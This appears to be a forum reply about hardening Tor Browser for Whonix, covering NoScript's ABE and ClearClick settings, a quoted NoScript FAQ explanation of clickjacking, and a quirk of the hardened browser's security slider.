Hi,
Re: jessie-proposed-updates -> doing this already, and 2.8.10 is working nicely.
Re: NoScript and ABE -> It is not required, as Tor Browser now blocks all access to 127.0.0.1 by default. So scrap that recommendation.
See https://trac.torproject.org/projects/tor/ticket/11493
Re: NoScript and ClearClick (Click jacking) protections, it is not enabled by default because certain false positives occur, typically on webpages relating to CAPTCHAs, some banking websites, some embedded PDFs etc.
An open ticket exists, with the feature having been temporarily disabled. I think we can recommend users set it to on, with a suitable warning about false positives.
See here: https://trac.torproject.org/projects/tor/ticket/14985
For interested readers, Clickjacking refers to:
https://noscript.net/faq#qa8_1
“Clickjacking” we designate a class of attacks (also known as “UI Redressing”) which consist in hiding or disguising an user interface element from a site you trust (e.g. the “Send” button of your webmail site or a pre-configured “Donate” Paypal button) in a way which leads you to click it without knowledge of what you’re exactly doing. In the impressive proof of concept by RSnake and Jeremiah, you clicked anywhere in their apparently innocuous page, believing you were doing nothing dangerous, but in reality you were activating your microphone and/or your webcam for Flash access, allowing the remote attacker to spy on you instantaneously.
More in general, an attacker can frame a portion of a certain web page you trust inside a different page under his control, decontextualizing it or making it transparent: this way he can easily trick you into interacting with it, and you end to perform a financial transaction or allow him special permissions, without remotely suspecting that something evil is going on.
If JavaScript is allowed on the malicious site, this becomes much easier because the invisible target page can be automatically positioned exactly under your mouse pointer, so anywhere you clicks the evildoer wins. However this attack can work even without JavaScript being allowed: the attacker just needs to trick you into clicking on a seemingly innocuous link or button.
Every web browser is affected, because this attack doesn’t rely on any vulnerability or bug which might be fixed overnight: instead, it exploits very basic and standard web features which are implemented everywhere and are unlikely to be removed any time soon.
These recommendations (and those you vetted further above) could be added to a “Safe Tor Browser Settings and Use” section in the security guide. The guides could probably be all re-worked, but getting around to the Quick-Start guide is probably a higher priority.
Of interest, have you noticed the hardened Tor Browser privacy slider on first run states “You have unusual customized settings” and does not let you change the low-medium-high setting, unless you first select the button to “reset to default”?
I wonder if this is changing any standard Whonix changes and could possibly be a security/privacy risk if users revert to ‘standard’ TBB settings in the first instance… it’s worth investigating the differences via the ‘user set’ preferences in about:config changes with TBB hardened (not accepting this change) & TBB hardened (accepting this change).
Most importantly, the changes avoiding stacked tor do not seem to be affected (I checked - the relevant Whonix string is there for both).